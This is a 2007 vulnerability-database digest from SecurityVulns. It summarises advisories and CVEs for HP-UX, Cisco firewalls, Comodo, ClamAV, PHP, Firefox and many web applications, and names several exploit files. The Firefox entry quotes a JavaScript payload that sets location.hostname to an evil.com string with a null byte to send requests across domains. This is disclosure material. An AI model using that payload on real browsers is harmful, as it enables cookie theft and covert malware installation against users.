Computer Security
[EN] securityvulns.ru no-pyccku


HP-UX SLSd unauthorized access
Published:15.02.2007
Source:
SecurityVulns ID:7239
Type:remote
Threat Level:
6/10
Description:It's possible to create any file with attacker-supplied data.
Affected:HP : HP-UX 10.20
 HP : HP-UX 11.11
CVE:CVE-2007-0915 (Distributed SLS daemon (SLSd) on HP-UX B.11.11 allows remote attackers to overwrite arbitrary files and gain privileges via a crafted RPC request.)
Original documentdocumentHP, HPSBUX02191 SSRT071302 rev.1 - HP-UX Running SLSd, Remote Unauthorized Arbitrary File Creation (15.02.2007)
 documentIDEFENSE, iDefense Security Advisory 02.13.07: Hewlett-Packard HP-UX SLSd Arbitrary File Creation Vulnerability (15.02.2007)

PalmOS Treo smartphones protection bypass
Published:15.02.2007
Source:
SecurityVulns ID:7240
Type:local
Threat Level:
4/10
Description:Find feature allows access to locked device.
Affected:VERIZON : Verizon Treo 650
 SPRINT : Sprint Treo 650
 CINGULAR : Cingular Treo 650
 CINGULAR : Cingular Treo 680
 SPRINT : Sprint Treo 700
 VERIZON : Verizon Treo 700
CVE:CVE-2007-0859 (The Find feature in Palm OS Treo smart phones operates despite the system password lock, which allows attackers with physical access to obtain sensitive information (memory contents) by doing (1) text searches or (2) paste operations after pressing certain keyboard shortcut keys.)
Original documentdocumentSYMANTEC, SYMSA-2007-002: Palm OS Treo Find Feature System Password Bypass (15.02.2007)

Cisco PIX / ASA / FWSM multiple security vulnerabilities
Published:15.02.2007
Source:
SecurityVulns ID:7242
Type:remote
Threat Level:
5/10
Description:Multiple DoS conditions on HTTP, SIP, TCP traffic parsing.
Affected:CISCO : PIX 6.3
 CISCO : PIX 7.0
 CISCO : FWSM 2.3
 CISCO : PIX 7.1
 CISCO : ASA 7.0
 CISCO : ASA 7.1
 CISCO : FWSM 3.1
 CISCO : PIX 7.2
 CISCO : ASA 7.2
 CISCO : ASA 6.3
CVE:CVE-2007-0968 (Unspecified vulnerability in Cisco Firewall Services Module (FWSM) before 2.3(4.7) and 3.x before 3.1(3.1) causes the access control entries (ACE) in an ACL to be improperly evaluated, which allows remote authenticated users to bypass intended certain ACL protections.)
 CVE-2007-0967 (Cisco Firewall Services Module (FWSM) 3.x before 3.1(3.1) allows remote attackers to cause a denial of service (device reboot) via malformed SNMP requests.)
 CVE-2007-0966 (Cisco Firewall Services Module (FWSM) 3.x before 3.1(3.11), when the HTTPS server is enabled, allows remote attackers to cause a denial of service (device reboot) via certain HTTPS traffic.)
 CVE-2007-0965 (Cisco FWSM 3.x before 3.1(3.2), when authentication is configured to use "aaa authentication match" or "aaa authentication include", allows remote attackers to cause a denial of service (device reboot) via a long HTTP request.)
 CVE-2007-0964 (Cisco FWSM 3.x before 3.1(3.18), when authentication is configured to use "aaa authentication match" or "aaa authentication include", allows remote attackers to cause a denial of service (device reboot) via a malformed HTTPS request.)
 CVE-2007-0963 (Unspecified vulnerability in Cisco Firewall Services Module (FWSM) 3.x before 3.1(3.3), when set to log at the "debug" level, allows remote attackers to cause a denial of service (device reboot) by sending packets that are not of a particular protocol such as TCP or UDP, which triggers the reboot during generation of Syslog message 710006.)
 CVE-2007-0962 (Cisco PIX 500 and ASA 5500 Series Security Appliances 7.0 before 7.0(4.14) and 7.1 before 7.1(2.1), and the FWSM 2.x before 2.3(4.12) and 3.x before 3.1(3.24), when "inspect http" is enabled, allows remote attackers to cause a denial of service (device reboot) via malformed HTTP traffic.)
 CVE-2007-0961 (Cisco PIX 500 and ASA 5500 Series Security Appliances 6.x before 6.3(5.115), 7.0 before 7.0(5.2), and 7.1 before 7.1(2.5), and the FWSM 3.x before 3.1(3.24), when the "inspect sip" option is enabled, allows remote attackers to cause a denial of service (device reboot) via malformed SIP packets.)
 CVE-2007-0960 (Unspecified vulnerability in Cisco PIX 500 and ASA 5500 Series Security Appliances 7.2.2, when configured to use the LOCAL authentication method, allows remote authenticated users to gain privileges via unspecified vectors.)
 CVE-2007-0959 (Cisco PIX 500 and ASA 5500 Series Security Appliances 7.2.2, when configured to inspect certain TCP-based protocols, allows remote attackers to cause a denial of service (device reboot) via malformed TCP packets.)
Original documentdocumentCISCO, Cisco Security Advisory: Multiple Vulnerabilities in Firewall Services Module (15.02.2007)
 documentCISCO, Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and ASA Appliances (15.02.2007)

Comodo firewall protection bypass
Published:15.02.2007
Source:
SecurityVulns ID:7243
Type:local
Threat Level:
4/10
Description:CRC32 control checksum is used for files protection making in trivial to bypass it.
Affected:COMODO : Comodo Firewall Pro 2.4
 COMODO : Comodo Personal Firewall 2.3
CVE:CVE-2007-1051 (Comodo Firewall Pro (formerly Comodo Personal Firewall) 2.4.17.183 and earlier uses a weak cryptographic hashing function (CRC32) to identify trusted modules, which allows local users to bypass security protections by substituting modified modules that have the same CRC32 value.)
Original documentdocumentMatousec - Transparent security Research, [Full-disclosure] Comodo DLL injection via weak hash function exploitation Vulnerability (15.02.2007)

Lizardtech DjVu plugin multiple security vulnerabilities
Published:15.02.2007
Source:
SecurityVulns ID:7244
Type:client
Threat Level:
5/10
Description:Multiple buffer overflows in different methods.
Affected:LIZARDTECH : DjVu Browser Plug-in 6.1
CVE:CVE-2007-0324 (Multiple buffer overflows in the LizardTech DjVu Browser Plug-in before 6.1.1 allow remote attackers to execute arbitrary code via unspecified vectors.)
Original documentdocumentBrett Moore, [Full-disclosure] Lizardtech DjVu Browser Plug-in - Multiple Vulnerabilities (15.02.2007)

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published:15.02.2007
Source:
SecurityVulns ID:7245
Type:remote
Threat Level:
5/10
Description:PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.
Affected:DESKPRO : DeskPRO 1.1
 ADVANCEDPOLL : Advanced Poll 2.0
 DRUPAL : Drupal 4.7
 PHPCC : phpCC 4.2
 DRUPAL : Drupal 5.1
 NABOCORP : nabopoll 1.1
 MOHA : MOHA Chat 0.1
 ATMAIL : @mail 0.61
 HARPIA : Harpia CMS 1.0
 SCART : SCart 2.0
 APACHESTATS : Apache Stats 0.0
 TAGIT : TagIt! Tagboard 2.1
 ZEBRAFEEDS : ZebraFeeds 1.0
 ANSATHEUS : AT Contenator 1.0
 XARANCMS : Xaran CMS 2.0
 POLLMENTOR : PollMentor 2.0
CVE:CVE-2007-1021 (SQL injection vulnerability in inc_listnews.asp in CodeAvalanche News 1.x allows remote attackers to execute arbitrary SQL commands via the CAT_ID parameter.)
 CVE-2007-1016 (SQL injection vulnerability in Aktueldownload Haber script allows remote attackers to execute arbitrary SQL commands via certain vectors related to the HaberDetay.asp and rss.asp components, and the id and kid parameters. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. NOTE: the combination of the HaberDetay.asp component and the id parameter is already covered by another February 2007 CVE candidate.)
 CVE-2007-1015 (SQL injection vulnerability in HaberDetay.asp in Aktueldownload Haber script allows remote attackers to execute arbitrary SQL commands via the id parameter.)
 CVE-2007-1012 (Cross-site scripting (XSS) vulnerability in faq.php in DeskPRO 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the article parameter.)
 CVE-2007-1010 (Multiple PHP remote file inclusion vulnerabilities in ZebraFeeds 1.0, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the zf_path parameter to (1) aggregator.php and (2) controller.php in newsfeeds/includes/.)
 CVE-2007-0985 (SQL injection vulnerability in nickpage.php in phpCC 4.2 beta and earlier allows remote attackers to execute arbitrary SQL commands via the npid parameter in a sign_gb action.)
 CVE-2007-0984 (SQL injection vulnerability in admin_poll.asp in PollMentor 2.0 allows remote attackers to execute arbitrary SQL commands via the id parameter to pollmentorres.asp.)
 CVE-2007-0983 (PHP remote file inclusion vulnerability in _admin/nav.php in AT Contenator 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the Root_To_Script parameter.)
 CVE-2007-0954 (MOHA Chat 0.1b7 and earlier does not require authentication for use of the plug in API, which has unknown impact and attack vectors.)
 CVE-2007-0953 (Cross-site scripting (XSS) vulnerability in search.pl in @Mail 4.61 and earlier allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.)
 CVE-2007-0952 (Multiple cross-site scripting (XSS) vulnerabilities in Scriptsez.net Virtual Calendar allow remote attackers to inject arbitrary web script or HTML via the (1) t and (2) yr parameters, and the (3) sho parameter when the m parameter is outside the intended range.)
 CVE-2007-0930 (Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.)
 CVE-2007-0928 (Virtual Calendar stores sensitive information under the web root with insufficient access control, which allows remote attackers to download an encoded password via a direct request for pwd.txt.)
 CVE-2007-0900 (Multiple PHP remote file inclusion vulnerabilities in TagIt! Tagboard 2.1.B Build 2 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) configpath parameter to (a) tagviewer.php, (b) tag_process.php, and (c) CONFIG/errmsg.inc.php; and (d) addTagmin.php, (e) ban_watch.php, (f) delTagmin.php, (g) delTag.php, (h) editTagmin.php, (i) editTag.php, (j) manageTagmins.php, and (k) verify.php in tagmin/; the (2) adminpath parameter to (l) tagviewer.php, (m) tag_process.php, and (n) tagmin/index.php; and the (3) admin parameter to (o) readconf.php, (p) updateconf.php, (q) updatefilter.php, and (r) wordfilter.php in tagmin/; different vectors than CVE-2006-5249.)
 CVE-2006-7024 (Multiple PHP remote file inclusion vulnerabilities in Harpia CMS 1.0.5 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) func_prog parameter to (a) preload.php and (b) index.php; (2) header_prog parameter to (c) missing.php and (d) email.php, (e) files.php, (f) headlines.php, (g) search.php, (h) topics.php, and (i) users.php in _mods/; (3) theme_root parameter to (j) footer.php, (k) header.php, (l) pfooter.php, and (m) pheader.php in _inc; (4) mod_root parameter to _inc/header.php; and the (5) mod_dir and (6) php_ext parameters to (n) _inc/web_statsConfig.php.)
 CVE-2006-7012 (scart.cgi in SCart 2.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the page parameter of a show_text action.)
 CVE-2006-7005 (SQL injection vulnerability in item.php in PSY Auction allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.)
 CVE-2006-7004 (Cross-site scripting (XSS) vulnerability in email_request.php in PSY Auction allows remote attackers to inject arbitrary web script or HTML via the user_id parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.)
 CVE-2006-7000 (Headstart Solutions DeskPRO allows remote attackers to obtain the full path via direct requests to (1) email/mail.php, (2) includes/init.php, (3) certain files in includes/cron/, and (4) jpgraph.php, (5) jpgraph_bar.php, (6) jpgraph_pie.php, and (7) jpgraph_pie3d.php in includes/graph/, which leaks the path in error messages.)
 CVE-2006-6999 (attachment.php in Headstart Solutions DeskPRO allows remote attackers to read all uploaded files by providing the file number in a modified id parameter.)
 CVE-2006-6998 (install/loader_help.php in Headstart Solutions DeskPRO allows remote attackers to obtain configuration information via a q=phpinfo QUERY_STRING, which calls the phpinfo function.)
 CVE-2006-5249 (PHP remote file inclusion vulnerability in tagmin/delTagUser.php in TagIt! Tagboard 2.1.B Build 2 (tagit2b) allows remote attackers to execute arbitrary PHP code via a URL in the configpath parameter.)
Original documentdocumentx0r0n_(at)_hotmail.com, Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability (15.02.2007)
 documentbeks, CodeAvalanche News SQL Injection (15.02.2007)
 document[email protected]_King, nabopoll 1.2 Remote Unprotected Admin Section Vulnerability (15.02.2007)
 document[email protected]_King, nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability (15.02.2007)
 documentThE [email protected], ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities (15.02.2007)
 documentbl4ck_(at)_bsdmail.org, XSS in [Calendar Express 2 ] (15.02.2007)
 documentbl4ck_(at)_bsdmail.org, XSS in [deskpro.com v1.1.0 ] (15.02.2007)
Files:Drupal < 5.1 Remote Command Execution Exploit
 Drupal < 4.7.6 Remote Command Execution Exploit
 phpCC Beta <= 4.2 (nickpage.php npid) Remote SQL Injection Exploit
 Xaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit
 AT Contenator <= v1.0 (Root_To_Script) Remote File Include Exploit
 Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE

iTinySoft Studio Total Video Player buffer overflow
Published:15.02.2007
Source:
SecurityVulns ID:7246
Type:client
Threat Level:
5/10
Description:Buffer overflow on .m3U files parsing.
Affected:ITINYSOFT : Total Video Player 1.03
CVE:CVE-2007-0949 (Stack-based buffer overflow in iTinySoft Studio Total Video Player 1.03, and possibly earlier, allows remote attackers to execute arbitrary code via a M3U playlist file that contains a long file name. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.)

Sun Solaris TCP packets processing race conditions
Published:15.02.2007
Source:
SecurityVulns ID:7247
Type:remote
Threat Level:
6/10
Description:DoS against system is possible.
Affected:ORACLE : Solaris 10
CVE:CVE-2007-0914 (Race condition in the TCP subsystem for Solaris 10 allows remote attackers to cause a denial of service (system panic) via unknown vectors.)

Multiple PHP vulnerabilities
Published:15.02.2007
Source:
SecurityVulns ID:7248
Type:local
Threat Level:
6/10
Description:Multiple buffer overflows, DoS conditions, information leaks, etc.
Affected:PHP : PHP 5.2
CVE:CVE-2007-0910 (Unspecified vulnerability in PHP before 5.2.1 allows attackers to "clobber" certain super-global variables via unspecified vectors.)
 CVE-2007-0909 (Multiple format string vulnerabilities in PHP before 5.2.1 might allow attackers to execute arbitrary code via format string specifiers to (1) all of the *print functions on 64-bit systems, and (2) the odbc_result_all function.)
 CVE-2007-0908 (The WDDX deserializer in the wddx extension in PHP 5 before 5.2.1 and PHP 4 before 4.4.5 does not properly initialize the key_length variable for a numerical key, which allows context-dependent attackers to read stack memory via a wddxPacket element that contains a variable with a string name before a numerical variable.)
 CVE-2007-0907 (Buffer underflow in PHP before 5.2.1 allows attackers to cause a denial of service via unspecified vectors involving the sapi_header_op function.)
 CVE-2007-0906 (Multiple buffer overflows in PHP before 5.2.1 allow attackers to cause a denial of service and possibly execute arbitrary code via unspecified vectors in the (1) session, (2) zip, (3) imap, and (4) sqlite extensions; (5) stream filters; and the (6) str_replace, (7) mail, (8) ibase_delete_user, (9) ibase_add_user, and (10) ibase_modify_user functions. NOTE: vector 6 might actually be an integer overflow (CVE-2007-1885). NOTE: as of 20070411, vector (3) might involve the imap_mail_compose function (CVE-2007-1825).)

ejabberd roster ODBC module vulnerability
Published:15.02.2007
Source:
SecurityVulns ID:7249
Type:remote
Threat Level:
5/10
CVE:CVE-2007-0903 (Unspecified vulnerability in the mod_roster_odbc module in ejabberd before 1.1.3 has unknown impact and attack vectors.)

ClamAV antivirus directory traversal
Published:15.02.2007
Source:
SecurityVulns ID:7250
Type:remote
Threat Level:
8/10
Description:MIME part id is used to form local filename without checking for ../. In addition, there is a DoS on CAB files parsing.
Affected:CLAMAV : ClamAV 0.88
CVE:CVE-2007-0898 (Directory traversal vulnerability in clamd in Clam AntiVirus ClamAV before 0.90 allows remote attackers to overwrite arbitrary files via a .. (dot dot) in the id MIME header parameter in a multi-part message.)
 CVE-2007-0897 (Clam AntiVirus ClamAV before 0.90 does not close open file descriptors under certain conditions, which allows remote attackers to cause a denial of service (file descriptor consumption and failed scans) via CAB archives with a cabinet header record length of zero, which causes a function to return without closing a file descriptor.)
Original documentdocumentIDEFENSE, iDefense Security Advisory 02.15.07: Multiple Vendor ClamAV CAB File Denial of Service Vulnerability (15.02.2007)
 documentIDEFENSE, iDefense Security Advisory 02.15.07: Multiple Vendor ClamAV MIME Parsing Directory Traversal Vulnerability (15.02.2007)

Mozilla Firefox cross domain access
updated since 15.02.2007
Published:27.02.2007
Source:
SecurityVulns ID:7238
Type:client
Threat Level:
8/10
Description:By using location.hostname='evil.com\x00foo.example.com' in javascript it's possible to make request for foo.example.com domain to be sent to evil.com. It makes it possible cross-domain access. Vulnerability can be used for hidden malware installation.
Affected:MOZILLA : Firefox 2.0
CVE:CVE-2007-1084 (Mozilla Firefox 2.0.0.1 and earlier does not prompt users before saving bookmarklets, which allows remote attackers to bypass the same-domain policy by tricking a user into saving a bookmarklet with a data: scheme, which is executed in the context of the last visited web page.)
 CVE-2007-1004 (Mozilla Firefox might allow remote attackers to conduct spoofing and phishing attacks by writing to an about:blank tab and overlaying the location bar.)
 CVE-2007-0981 (Mozilla based browsers, including Firefox before 1.5.0.10 and 2.x before 2.0.0.2, and SeaMonkey before 1.0.8, allow remote attackers to bypass the same origin policy, steal cookies, and conduct other attacks by writing a URI with a null byte to the hostname (location.hostname) DOM property, due to interactions with DNS resolver code.)
Original documentdocumentMOZILLA, Mozilla Foundation Security Advisory 2007-07 (27.02.2007)
 documentMichal Zalewski, [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability (22.02.2007)
 documentMichal Zalewski, Firefox: about:blank is phisher's best friend (18.02.2007)
 documentMichal Zalewski, Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability (15.02.2007)
 documentMichal Zalewski, Firefox: serious cookie stealing / same-domain bypass vulnerability (15.02.2007)

HP-UX ARPA transport DoS
updated since 15.02.2007
Published:24.01.2008
Source:
SecurityVulns ID:7241
Type:remote
Threat Level:
5/10
Affected:HP : HP-UX 11.11
 HP : HP-UX 11.23
CVE:CVE-2007-6425
 CVE-2007-1994 (Unspecified vulnerability in the Address and Routing Parameter Area (ARPA) transport functionality in HP-UX B.11.00 allows local users to cause a denial of service via unknown vectors. NOTE: due to lack of vendor details, it is not clear whether this is the same as CVE-2007-0916.)
 CVE-2007-0916 (Unspecified vulnerability in the Address and Routing Parameter Area (ARPA) transport functionality in HP-UX B.11.11 and B.11.23 allows local users to cause an unspecified denial of service via unknown vectors.)
Original documentdocumentHP, [security bulletin] HPSBUX02306 SSRT071463 rev.1 - HP-UX Running ARPA Transport, Remote Denial of Service (DoS) (24.01.2008)
 documentHP, [security bulletin] HPSBUX02248 SSRT071437 rev.1 - HP-UX Running ARPA Transport, Remote Denial of Service (DoS) (03.08.2007)
 documentHP, [security bulletin] HPSBUX02247 SSRT071432 rev.1 - HP-UX Running ARPA Transport, Local Denial of Service (DoS) (03.08.2007)
 documentHP, HPSBUX02205 SSRT061120 rev.1 - HP-UX Running ARPA Transport, Local Denial of Service (DoS) (13.04.2007)
 documentHP, [security bulletin] HPSBUX02192 SSRT061233 rev.1 - HP-UX Running ARPA Transport, Local Denial of Service (DoS) (15.02.2007)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod